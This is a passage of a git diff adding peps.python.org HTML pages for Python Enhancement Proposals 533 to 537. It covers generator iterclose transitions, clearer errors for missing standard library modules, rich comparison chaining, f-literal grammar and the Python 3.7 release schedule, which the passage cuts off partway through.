[QUESTION: currently, if you close a generator and then try to iterate +over it then it just raises Stop(Async)Iteration, so code that +passes the same generator object to multiple for loops but forgets +to use itertools.preserve won’t see an obvious error – the second +for loop will just exit immediately. Perhaps it would be better if +iterating a closed generator raised a RuntimeError? Note that +files don’t have this problem – attempting to iterate a closed file +object already raises ValueError.]

+

Specifically, the incompatibility happens when all of these factors +come together:

+
    +
  • The automatic calling of __(a)iterclose__ is enabled
  • +
  • The iterable did not previously define __(a)iterclose__
  • +
  • The iterable does now define __(a)iterclose__
  • +
  • The iterable is re-used after the for loop exits
  • +
+

So the problem is how to manage this transition, and those are the +levers we have to work with.

+

First, observe that the only async iterables where we propose to add +__aiterclose__ are async generators, and there is currently no +existing code using async generators (though this will start changing +very soon), so the async changes do not produce any backwards +incompatibilities. (There is existing code using async iterators, but +using the new async for loop on an old async iterator is harmless, +because old async iterators don’t have __aiterclose__.) In +addition, PEP 525 was accepted on a provisional basis, and async +generators are by far the biggest beneficiary of this PEP’s proposed +changes. Therefore, I think we should strongly consider enabling +__aiterclose__ for async for loops and async generators ASAP, +ideally for 3.6.0 or 3.6.1.

+

For the non-async world, things are harder, but here’s a potential +transition path:

+

In 3.7:

+

Our goal is that existing unsafe code will start emitting warnings, +while those who want to opt-in to the future can do that immediately:

+
    +
  • We immediately add all the __iterclose__ methods described +above.
  • +
  • If from __future__ import iterclose is in effect, then for +loops and * unpacking call __iterclose__ as specified above.
  • +
  • If the future is not enabled, then for loops and * +unpacking do not call __iterclose__. But they do call some +other method instead, e.g. __iterclose_warning__.
  • +
  • Similarly, functions like list use stack introspection (!!) to +check whether their direct caller has __future__.iterclose +enabled, and use this to decide whether to call __iterclose__ or +__iterclose_warning__.
  • +
  • For all the wrapper iterators, we also add __iterclose_warning__ +methods that forward to the __iterclose_warning__ method of the +underlying iterator or iterators.
  • +
  • For generators (and files, if we decide to do that), +__iterclose_warning__ is defined to set an internal flag, and +other methods on the object are modified to check for this flag. If +they find the flag set, they issue a PendingDeprecationWarning +to inform the user that in the future this sequence would have led +to a use-after-close situation and the user should use +preserve().
  • +
+

In 3.8:

+
    +
  • Switch from PendingDeprecationWarning to DeprecationWarning
  • +
+

In 3.9:

+
    +
  • Enable the __future__ unconditionally and remove all the +__iterclose_warning__ stuff.
  • +
+

I believe that this satisfies the normal requirements for this kind of +transition – opt-in initially, with warnings targeted precisely to +the cases that will be affected, and a long deprecation cycle.

+

Probably the most controversial / risky part of this is the use of +stack introspection to make the iterable-consuming functions sensitive +to a __future__ setting, though I haven’t thought of any situation +where it would actually go wrong yet…

+
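
For concreteness, the introspection in question might look something like the following sketch, where CO_FUTURE_ITERCLOSE is a hypothetical compiler flag analogous to the flags set by existing __future__ imports:

+
import sys
+
+CO_FUTURE_ITERCLOSE = 0x1000000  # hypothetical flag value
+
+def _caller_has_iterclose_future():
+    # Inspect the code object of the frame that called the consuming
+    # function (e.g. list()) and test the hypothetical __future__ flag
+    caller = sys._getframe(2)
+    return bool(caller.f_code.co_flags & CO_FUTURE_ITERCLOSE)
+
+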
+
+

Acknowledgements

+

Thanks to Yury Selivanov, Armin Rigo, and Carl Friedrich Bolz for +helpful discussion on earlier versions of this idea.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0533.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0534/index.html b/pep-0534/index.html new file mode 100644 index 00000000000..23afd70319d --- /dev/null +++ b/pep-0534/index.html @@ -0,0 +1,481 @@ + PEP 534 – Improved Errors for Missing Standard Library Modules | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 534 – Improved Errors for Missing Standard Library Modules

+
+
Author:
+
Tomáš Orsava <tomas.n at orsava.cz>, +Petr Viktorin <encukou at gmail.com>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2016
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Python is often built or distributed without its full standard library. +However, there is as yet no standard, user-friendly way of properly +informing the user about the failure to import such missing standard library +modules.

+

This PEP proposes a mechanism for identifying expected standard library modules +and providing more informative error messages to users when attempts to import +standard library modules fail.

+
+
+

PEP Deferral

+

The PEP authors aren’t actively working on this PEP, so if improving these +error messages is an idea that you’re interested in pursuing, please get in +touch! (e.g. by posting to the python-dev mailing list).

+

The key piece of open work is determining how to get the autoconf and Visual +Studio build processes to populate the sysconfig metadata file with the lists +of expected and optional standard library modules.

+
+
+

Motivation

+

There are several use cases for including only a subset of Python’s standard +library. However, there is so far no user-friendly mechanism for informing +the user why a stdlib module is missing and how to remedy the situation +appropriately.

+
+

CPython

+

When one of Python’s standard library modules (such as _sqlite3) cannot be +compiled during a CPython build because of missing dependencies (e.g. SQLite +header files), the module is simply skipped. If you then install this compiled +Python and use it to try to import one of the missing modules, Python will fail +with a ModuleNotFoundError.

+

For example, after deliberately removing sqlite-devel from the local +system:

+
$ ./python -c "import sqlite3"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
+    from sqlite3.dbapi2 import *
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
+    from _sqlite3 import *
+ModuleNotFoundError: No module named '_sqlite3'
+
+
+

This can confuse users who may not understand why a cleanly built Python is +missing standard library modules.

+
+
+

Linux and other distributions

+

Many Linux and other distributions are already separating out parts of the +standard library to standalone packages. Among the most commonly excluded +modules are the tkinter module, since it draws in a dependency on the +graphical environment, idlelib, since it depends on tkinter (and most +Linux desktop environments provide their own default code editor), and the +test package, as it only serves to test Python internally and is about as +big as the rest of the standard library put together.

+

The methods of omission differ between distributions. For example, Debian patches +the file Lib/tkinter/__init__.py to wrap the line import _tkinter in +a try-except block; upon encountering an ImportError, it simply adds +the following to the error message: please install the python3-tk package +[1]. Fedora and other distributions simply don’t include the +omitted modules, potentially leaving users baffled as to where to find them.

+

An example from Fedora 29:

+
$ python3 -c "import tkinter"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No module named 'tkinter'
+
+
+
+
+
+

Specification

+
+

APIs to list expected standard library modules

+

To allow for easier identification of which module names are expected to be +resolved in the standard library, the sysconfig module will be extended +with two additional functions:

+
    +
  • sysconfig.get_stdlib_modules(), which will provide a list of the names of +all top level Python standard library modules (including private modules)
  • +
  • sysconfig.get_optional_modules(), which will list optional public top level +standard library module names
  • +
+

The results of sysconfig.get_optional_modules() and the existing +sys.builtin_module_names will both be subsets of the full list provided by +the new sysconfig.get_stdlib_modules() function.

+
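
A hypothetical interactive session illustrating those relationships (both functions are proposed APIs, so this does not work on any current Python version):

+
>>> import sys, sysconfig
+>>> stdlib = set(sysconfig.get_stdlib_modules())
+>>> set(sysconfig.get_optional_modules()) <= stdlib
+True
+>>> set(sys.builtin_module_names) <= stdlib
+True
+
+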

These added lists will be generated during the Python build process and saved in +the _sysconfigdata-*.py file along with other sysconfig values.

+

Possible reasons for modules being in the “optional” list will be:

+
    +
  • the module relies on an optional build dependency (e.g. _sqlite3, +tkinter, idlelib)
  • +
  • the module is private for other reasons and hence may not be present on all +implementations (e.g. _freeze_importlib, _collections_abc)
  • +
  • the module is platform specific and hence may not be present in all +installations (e.g. winreg)
  • +
  • the test package may also be freely omitted from Python runtime +installations, as it is intended for use in testing Python implementations, +not as a runtime library for Python projects to use (the public API offering +testing utilities is unittest)
  • +
+

(Note: the ensurepip, venv, and distutils modules are all considered +mandatory modules in this PEP, even though not all redistributors currently +adhere to that practice)

+
+
+

Changes to the default sys.excepthook implementation

+

The default implementation of the sys.excepthook function will then be +modified to dispense an appropriate message when it detects a failure to +import a module identified by one of the two new sysconfig functions as +belonging to the Python standard library.

+

Revised error message for a module that relies on an optional build dependency +or is otherwise considered optional when Python is installed:

+
$ ./python -c "import sqlite3"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
+    from sqlite3.dbapi2 import *
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
+    from _sqlite3 import *
+ModuleNotFoundError: Optional standard library module '_sqlite3' was not found
+
+
+

Revised error message for a submodule of an optional top level package when the +entire top level package is missing:

+
$ ./python -c "import test.regrtest"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: Optional standard library module 'test' was not found
+
+
+

Revised error message for a submodule of an optional top level package when the +top level package is present:

+
$ ./python -c "import test.regrtest"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No submodule named 'test.regrtest' in optional standard library module 'test'
+
+
+

Revised error message for a module that is always expected to be available:

+
$ ./python -c "import ensurepip"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: Standard library module 'ensurepip' was not found
+
+
+

Revised error message for a missing submodule of a standard library package when +the top level package is present:

+
$ ./python -c "import encodings.mbcs"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No submodule named 'encodings.mbcs' in standard library module 'encodings'
+
+
+

These revised error messages make it clear that the missing modules are expected +to be available from the standard library, but are not available for some reason, +rather than being an indicator of a missing third party dependency in the current +environment.

+
+
+
+

Design Discussion

+
+

Modifying sys.excepthook

+

The sys.excepthook function gets called when a raised exception is uncaught +and the program is about to exit or (in an interactive session) control is +being returned to the prompt. This makes it a perfect place for customized +error messages, as it will not influence caught errors and thus not slow down +normal execution of Python scripts.

+
+
+

Public API to query expected standard library module names

+

The inclusion of the functions sysconfig.get_stdlib_modules() and +sysconfig.get_optional_modules() will provide a long sought-after +way of easily listing the names of Python standard library modules +[2], which will (among other benefits) make it easier for +code analysis, profiling, and error reporting tools to offer runtime +--ignore-stdlib flags.

+
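
For example, such a tool’s --ignore-stdlib flag might be implemented with a filter along these lines (a sketch using the proposed API; only top level names are listed, so the first component of a dotted name is tested):

+
import sysconfig
+
+def is_stdlib_module(module_name):
+    top_level = module_name.partition(".")[0]
+    return top_level in set(sysconfig.get_stdlib_modules())
+
+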
+
+

Only including top level module names

+

This PEP proposes that only top level module and package names be reported by +the new query APIs. This is sufficient information to generate the proposed +error messages, reduces the number of required entries by an order of magnitude, +and simplifies the process of generating the related metadata during the build +process.

+

If this is eventually found to be overly limiting, a new include_submodules +flag could be added to the query APIs. However, this is not part of the initial +proposal, as the benefits of doing so aren’t currently seen as justifying the +extra complexity.

+

There is one known consequence of this restriction, which is that the new +default excepthook implementation will report incorrect submodules names the +same way that it reports genuinely missing standard library submodules:

+
$ ./python -c "import unittest.muck"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No submodule named 'unittest.muck' in standard library module 'unittest'
+
+
+
+
+

Listing private top level module names as optional standard library modules

+

Many of the modules that have an optional external build dependency are written +as hybrid modules, where there is a shared Python wrapper around an +implementation dependent interface to the underlying external library. In other +cases, a private top level module may simply be a CPython implementation detail, +and other implementations may not provide that module at all.

+

To report import errors involving these modules appropriately, the new default +excepthook implementation needs them to be reported by the new query APIs.

+
+ +
+
+

Deferred Ideas

+

The ideas in this section are concepts that this PEP would potentially help +enable, but they’re considered out of scope for the initial proposal.

+
+

Platform dependent modules

+

Some standard library modules may be missing because they’re only provided on +particular platforms. For example, the winreg module is only available on +Windows:

+
$ python3 -c "import winreg"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No module named 'winreg'
+
+
+

In the current proposal, these platform dependent modules will simply be +included with all the other optional modules rather than attempting to expose +the platform dependency information in a more structured way.

+

However, the platform dependence is at least tracked at the level of “Windows”, +“Unix”, “Linux”, and “FreeBSD” for the benefit of the documentation, so it +seems plausible that it could potentially be exposed programmatically as well.

+
+
+

Emitting a warning when __main__ shadows a standard library module

+

Given the new query APIs, the new default excepthook implementation could +potentially detect when __main__.__file__ or __main__.__spec__.name +match a standard library module, and emit a suitable warning.

+

However, actually doing anything along these lines would first require reviewing +more cases where users actually encounter this problem, and the various options +for potentially offering more information to assist in debugging the situation, +rather than being incorporated right now.

+
+
+
+

Recommendation for Downstream Distributors

+

By patching site.py [*] to provide their own implementation of the +sys.excepthook function, Python distributors can display tailor-made +error messages for any uncaught exceptions, including informing the user of +a proper, distro-specific way to install missing standard library modules upon +encountering a ModuleNotFoundError.

+
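
A sketch of the kind of hook a distributor might ship (the specific module-to-package mapping and install hint shown are hypothetical examples):

+
import sys
+
+_original_excepthook = sys.excepthook
+
+def _distro_excepthook(exc_type, exc, tb):
+    # Hypothetical example: point Fedora-style users at the right package
+    if issubclass(exc_type, ModuleNotFoundError) and exc.name == "tkinter":
+        print("Hint: install the python3-tkinter package to get tkinter",
+              file=sys.stderr)
+    _original_excepthook(exc_type, exc, tb)
+
+sys.excepthook = _distro_excepthook
+
+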

Some downstream distributors are already using this method of patching +sys.excepthook to integrate with platform crash reporting mechanisms.

+
+
+

Backwards Compatibility

+

No problems with backwards compatibility are expected. Distributions that are +already patching Python modules to provide custom handling of missing +dependencies can continue to do so unhindered.

+
+
+

Reference and Example Implementation

+

TBD. The finer details will depend on what’s practical given the capabilities +of the CPython build system (other implementations should then be able to use +the generated CPython data, rather than having to regenerate it themselves).

+
+
+

Notes and References

+ +

Ideas leading up to this PEP were discussed on the python-dev mailing list +and subsequently on python-ideas.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0534.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0535/index.html b/pep-0535/index.html new file mode 100644 index 00000000000..551622a49d8 --- /dev/null +++ b/pep-0535/index.html @@ -0,0 +1,303 @@ + PEP 535 – Rich comparison chaining | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 535 – Rich comparison chaining

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Requires:
+
532
+
Created:
+
12-Nov-2016
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

PEP Deferral

+

Further consideration of this PEP has been deferred until Python 3.8 at the +earliest.

+
+
+

Abstract

+

Inspired by PEP 335, and building on the circuit breaking protocol described +in PEP 532, this PEP proposes a change to the definition of chained comparisons, +where the comparison chaining will be updated to use the left-associative +circuit breaking operator (else) rather than the logical disjunction +operator (and) if the left hand comparison returns a circuit breaker as +its result.

+

While there are some practical complexities arising from the current handling +of single-valued arrays in NumPy, this change should be sufficient to allow +elementwise chained comparison operations for matrices, where the result +is a matrix of boolean values, rather than raising ValueError +or tautologically returning True (indicating a non-empty matrix).

+
+
+

Relationship with other PEPs

+

This PEP has been extracted from earlier iterations of PEP 532, as a +follow-on use case for the circuit breaking protocol, rather than an essential +part of its introduction.

+

The specific proposal in this PEP to handle the element-wise comparison use +case by changing the semantic definition of comparison chaining is drawn +directly from Guido’s rejection of PEP 335.

+
+
+

Specification

+

A chained comparison like 0 < x < 10 written as:

+
LEFT_BOUND LEFT_OP EXPR RIGHT_OP RIGHT_BOUND
+
+
+

is currently roughly semantically equivalent to:

+
_expr = EXPR
+_lhs_result = LEFT_BOUND LEFT_OP _expr
+_expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
+
+
+

Using the circuit breaking concepts introduced in PEP 532, this PEP proposes +that comparison chaining be changed to explicitly check if the left comparison +returns a circuit breaker, and if so, use else rather than and to +implement the comparison chaining:

+
_expr = EXPR
+_lhs_result = LEFT_BOUND LEFT_OP _expr
+if hasattr(type(_lhs_result), "__else__"):
+    _expr_result = _lhs_result else (_expr RIGHT_OP RIGHT_BOUND)
+else:
+    _expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
+
+
+

This allows types like NumPy arrays to control the behaviour of chained +comparisons by returning suitably defined circuit breakers from comparison +operations.

+

The expansion of this logic to an arbitrary number of chained comparison +operations would be the same as the existing expansion for and.

+
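
To make that expansion concrete, here is a runnable emulation, where circuit_else is a hypothetical helper standing in for the proposed binary else operator, with the right operand passed lazily as a thunk:

+
def circuit_else(lhs, rhs_thunk):
+    cls = type(lhs)
+    if not hasattr(cls, "__else__"):
+        return lhs and rhs_thunk()  # current 'and' based semantics
+    if bool(lhs):
+        # Short-circuit: the breaker is passed back in as the missing operand
+        return cls.__then__(lhs, lhs)
+    return cls.__else__(lhs, rhs_thunk())
+
+# 'A < B < C < D' would then evaluate left-associatively as:
+# circuit_else(circuit_else(A < B, lambda: B < C), lambda: C < D)
+
+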
+
+

Rationale

+

In ultimately rejecting PEP 335, Guido van Rossum noted [1]:

+
+
The NumPy folks brought up a somewhat separate issue: for them, +the most common use case is chained comparisons (e.g. A < B < C).
+

To understand this observation, we first need to look at how comparisons work +with NumPy arrays:

+
>>> import numpy as np
+>>> increasing = np.arange(5)
+>>> increasing
+array([0, 1, 2, 3, 4])
+>>> decreasing = np.arange(4, -1, -1)
+>>> decreasing
+array([4, 3, 2, 1, 0])
+>>> increasing < decreasing
+array([ True,  True, False, False, False], dtype=bool)
+
+
+

Here we see that NumPy array comparisons are element-wise by default, comparing +each element in the left hand array to the corresponding element in the right +hand array, and producing a matrix of boolean results.

+

If either side of the comparison is a scalar value, then it is broadcast across +the array and compared to each individual element:

+
>>> 0 < increasing
+array([False,  True,  True,  True,  True], dtype=bool)
+>>> increasing < 4
+array([ True,  True,  True,  True, False], dtype=bool)
+
+
+

However, this broadcasting idiom breaks down if we attempt to use chained +comparisons:

+
>>> 0 < increasing < 4
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
+
+
+

The problem is that internally, Python implicitly expands this chained +comparison into the form:

+
>>> 0 < increasing and increasing < 4
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
+
+
+

And NumPy only permits implicit coercion to a boolean value for single-element +arrays where a.any() and a.all() can be assured of having the same +result:

+
>>> np.array([False]) and np.array([False])
+array([False], dtype=bool)
+>>> np.array([False]) and np.array([True])
+array([False], dtype=bool)
+>>> np.array([True]) and np.array([False])
+array([False], dtype=bool)
+>>> np.array([True]) and np.array([True])
+array([ True], dtype=bool)
+
+
+

The proposal in this PEP would allow this situation to be changed by updating +the definition of element-wise comparison operations in NumPy to return a +dedicated subclass that implements the new circuit breaking protocol and also +changes the result array’s interpretation in a boolean context to always +return False and hence never trigger the short-circuiting behaviour:

+
class ComparisonResultArray(np.ndarray):
+    def __bool__(self):
+        # Element-wise comparison chaining never short-circuits
+        return False
+    def _raise_NotImplementedError(self):
+        msg = ("Comparison array truth values are ambiguous outside "
+               "chained comparisons. Use a.any() or a.all()")
+        raise NotImplementedError(msg)
+    def __not__(self):
+        self._raise_NotImplementedError()
+    def __then__(self, result):
+        # Short-circuiting on a comparison result is never well-defined
+        self._raise_NotImplementedError()
+    def __else__(self, result):
+        # "result" is the outcome of the next comparison in the chain
+        return np.logical_and(self, result.view(ComparisonResultArray))
+
+
+

With this change, the chained comparison example above would be able to return:

+
>>> 0 < increasing < 4
+ComparisonResultArray([ False,  True,  True,  True, False], dtype=bool)
+
+
+
+
+

Implementation

+

Actual implementation has been deferred pending in-principle interest in the +idea of making the changes proposed in PEP 532.

+

…TBD…

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0535.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0536/index.html b/pep-0536/index.html new file mode 100644 index 00000000000..53a1934533f --- /dev/null +++ b/pep-0536/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 536 – Final Grammar for Literal String Interpolation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 536 – Final Grammar for Literal String Interpolation

+
+
Author:
+
Philipp Angerer <phil.angerer at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
11-Dec-2016
+
Python-Version:
+
3.7
+
Post-History:
+
18-Aug-2016, +23-Dec-2016, +15-Mar-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 498 introduced Literal String Interpolation (or “f-strings”). +The expression portions of those literals, however, are subject to +certain restrictions. This PEP proposes a formal grammar lifting +those restrictions, promoting “f-strings” to “f-expressions” or f-literals.

+

This PEP expands upon the f-strings introduced by PEP 498, +so this text requires familiarity with PEP 498.

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn in favour of PEP 701. +PEP 701 addresses all important points of this PEP.

+
+
+

Terminology

+

This text will refer to the existing grammar as “f-strings”, +and the proposed one as “f-literals”.

+

Furthermore, it will refer to the {}-delimited expressions in +f-literals/f-strings as “expression portions” and the static string content +around them as “string portions”.

+
+
+

Motivation

+

The current implementation of f-strings in CPython relies on the existing +string parsing machinery and post-processing of its tokens. This results in +several restrictions on the expressions usable within f-strings:

+
    +
  1. It is impossible to use the quote character delimiting the f-string +within the expression portion:
    >>> f'Magic wand: { bag['wand'] }'
    +                             ^
    +SyntaxError: invalid syntax
    +
    +
    +
  2. +
  3. A previously considered way around it would lead to escape sequences +in executed code and is prohibited in f-strings:
    >>> f'Magic wand { bag[\'wand\'] } string'
    +SyntaxError: f-string expression portion cannot include a backslash
    +
    +
    +
  4. +
  5. Comments are forbidden even in multi-line f-strings:
    >>> f'''A complex trick: {
    +... bag['bag']  # recursive bags!
    +... }'''
    +SyntaxError: f-string expression part cannot include '#'
    +
    +
    +
  6. +
  7. Expression portions need to wrap ':' and '!' in braces:
    >>> f'Useless use of lambdas: { lambda x: x*2 }'
    +SyntaxError: unexpected EOF while parsing
    +
    +
    +
  8. +
+

These limitations serve no purpose from a language user perspective and +can be lifted by giving f-literals a regular grammar without exceptions +and implementing it using dedicated parse code.

+
+
+

Rationale

+

The restrictions mentioned in Motivation are non-obvious and counter-intuitive +unless the user is familiar with the f-literals’ implementation details.

+

As mentioned, a previous version of PEP 498 allowed escape sequences +anywhere in f-strings, including as ways to encode the braces delimiting +the expression portions and in their code. They would be expanded before +the code is parsed, which would have had several important ramifications:

+

1. It would not be clear to human readers which portions are expressions +and which are strings. Great material for an “obfuscated/underhanded +Python challenge”. +2. Syntax highlighters are good at parsing nested grammar, but not +at recognizing escape sequences. ECMAScript 2016 (JavaScript) allows +escape sequences in its identifiers [1] and the author knows of no +syntax highlighter able to correctly highlight code making use of this.

+

As a consequence, the expression portions would be harder to recognize +with and without the aid of syntax highlighting. With the new grammar, +it is easy to extend syntax highlighters to correctly parse +and display f-literals:

+
f'Magic wand: {bag['wand']:^10}'

Highlighting expression portions with possible escape sequences would +mean creating a modified copy of all rules of the complete expression +grammar, accounting for the possibility of escape sequences in keywords, +delimiters, and all other language syntax. Each such duplication would +yield one level of escaping depth, and the exercise would have to be +repeated for deeper escaping in a recursive f-literal. This is the case +since no highlighting engine known to the author supports expanding escape +sequences before applying rules to a certain context. Nesting contexts, +however, is a standard feature of all highlighting engines.

+

Familiarity also plays a role: Arbitrary nesting of expressions +without expansion of escape sequences is available in every single +other language employing a string interpolation method that uses +expressions instead of just variable names. [2]

+
+
+

Specification

+

PEP 498 specified f-strings as the following, but placed restrictions on them:

+
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
+
+
+

All restrictions mentioned in the PEP are lifted from f-literals, +as explained below:

+
    +
  1. Expression portions may now contain strings delimited with the same +kind of quote that is used to delimit the f-literal.
  2. +
  3. Backslashes may now appear within expressions just like anywhere else +in Python code. In case of strings nested within f-literals, +escape sequences are expanded when the innermost string is evaluated.
  4. +
  5. Comments, using the '#' character, are possible only in multi-line +f-literals, since comments are terminated by the end of the line +(which makes closing a single-line f-literal impossible).
  6. +
  7. Expression portions may contain ':' or '!' wherever +syntactically valid. The first ':' or '!' that is not part +of an expression has to be followed by a valid coercion or format specifier.
  8. +
+

A remaining restriction not explicitly mentioned by PEP 498 is line breaks +in expression portions. Since strings delimited by single ' or " +characters are expected to be single line, line breaks remain illegal +in expression portions of single line strings.

+
+

Note

+

Is lifting of the restrictions sufficient, +or should we specify a more complete grammar?

+
+
+
+

Backwards Compatibility

+

f-literals are fully backwards compatible with f-strings, +and expand the set of syntax considered legal.

+
+
+

Reference Implementation

+

TBD

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0536.rst

+

Last modified: 2023-10-26 09:35:14 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0537/index.html b/pep-0537/index.html new file mode 100644 index 00000000000..2c78c750497 --- /dev/null +++ b/pep-0537/index.html @@ -0,0 +1,364 @@ + + + + + + + + PEP 537 – Python 3.7 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 537 – Python 3.7 Release Schedule

+
+
Author:
+
Ned Deily <nad at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
23-Dec-2016
+
Python-Version:
+
3.7
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.7. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.7 Release Manager: Ned Deily
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

3.7 Lifespan

+

3.7 will receive bugfix updates +approximately every 3 months for about 24 months. Sometime after the release of +3.8.0 final, a final 3.7 bugfix update will be released. +After that, it is expected that +security updates +(source only) will be released as needed until 5 years after +the release of 3.7 final, so until approximately 2023-06.

+

As of 2023-06-27, 3.7 has reached the +end-of-life phase +of its release cycle. 3.7.17 was the final security release. The code base for +3.7 is now frozen; no further updates will be provided, nor will issues of any +kind be accepted on the bug tracker.

+
+
+

Release Schedule

+
+

3.7.0 schedule

+
    +
  • 3.7 development begins: 2016-09-12
  • +
  • 3.7.0 alpha 1: 2017-09-19
  • +
  • 3.7.0 alpha 2: 2017-10-17
  • +
  • 3.7.0 alpha 3: 2017-12-05
  • +
  • 3.7.0 alpha 4: 2018-01-09
  • +
  • 3.7.0 beta 1: 2018-01-31 +(No new features beyond this point.)
  • +
  • 3.7.0 beta 2: 2018-02-27
  • +
  • 3.7.0 beta 3: 2018-03-29
  • +
  • 3.7.0 beta 4: 2018-05-02
  • +
  • 3.7.0 beta 5: 2018-05-30
  • +
  • 3.7.0 candidate 1: 2018-06-12
  • +
  • 3.7.0 final: 2018-06-27
  • +
+
+
+

3.7.1 schedule (first bugfix release)

+
    +
  • 3.7.1 candidate 1: 2018-09-26
  • +
  • 3.7.1 candidate 2: 2018-10-13
  • +
  • 3.7.1 final: 2018-10-20
  • +
+
+
+

3.7.2 schedule

+
    +
  • 3.7.2 candidate 1: 2018-12-11
  • +
  • 3.7.2 final: 2018-12-24
  • +
+
+
+

3.7.3 schedule

+
    +
  • 3.7.3 candidate 1: 2019-03-12
  • +
  • 3.7.3 final: 2019-03-25
  • +
+
+
+

3.7.4 schedule

+
    +
  • 3.7.4 candidate 1: 2019-06-18
  • +
  • 3.7.4 candidate 2: 2019-07-02
  • +
  • 3.7.4 final: 2019-07-08
  • +
+
+
+

3.7.5 schedule

+
    +
  • 3.7.5 candidate 1: 2019-10-02
  • +
  • 3.7.5 final: 2019-10-15
  • +
+
+
+

3.7.6 schedule

+
    +
  • 3.7.6 candidate 1: 2019-12-11
  • +
  • 3.7.6 final: 2019-12-18
  • +
+
+
+

3.7.7 schedule

+
    +
  • 3.7.7 candidate 1: 2020-03-04
  • +
  • 3.7.7 final: 2020-03-10
  • +
+
+
+

3.7.8 schedule (last bugfix release)

+

Last planned release of binaries

+
    +
  • 3.7.8 candidate 1: 2020-06-15
  • +
  • 3.7.8 final: 2020-06-27
  • +
+
+
+

3.7.9 schedule (security/binary release)

+

Security fixes plus updated binary installers +to address 3.7.8 issues; no further binary +releases are planned.

+
    +
  • 3.7.9 final: 2020-08-17
  • +
+
+
+

3.7.10 schedule

+
    +
  • 3.7.10 final: 2021-02-15
  • +
+
+
+

3.7.11 schedule

+
    +
  • 3.7.11 final: 2021-06-28
  • +
+
+
+

3.7.12 schedule

+
    +
  • 3.7.12 final: 2021-09-04
  • +
+
+
+

3.7.13 schedule

+
    +
  • 3.7.13 final: 2022-03-16
  • +
+
+
+

3.7.14 schedule

+
    +
  • 3.7.14 final: 2022-09-06
  • +
+
+
+

3.7.15 schedule

+
    +
  • 3.7.15 final: 2022-10-11
  • +
+
+
+

3.7.16 schedule

+
    +
  • 3.7.16 final: 2022-12-06
  • +
+
+
+

3.7.17 schedule (last security-only release)

+
    +
  • 3.7.17 final: 2023-06-06
  • +
+
+
+
+

Features for 3.7

+

Implemented PEPs for 3.7 (as of 3.7.0 beta 1):

+
    +
  • PEP 538, Coercing the legacy C locale to a UTF-8 based locale
  • +
  • PEP 539, A New C-API for Thread-Local Storage in CPython
  • +
  • PEP 540, UTF-8 mode
  • +
  • PEP 552, Deterministic pyc
  • +
  • PEP 553, Built-in breakpoint()
  • +
  • PEP 557, Data Classes
  • +
  • PEP 560, Core support for typing module and generic types
  • +
  • PEP 562, Module __getattr__ and __dir__
  • +
  • PEP 563, Postponed Evaluation of Annotations
  • +
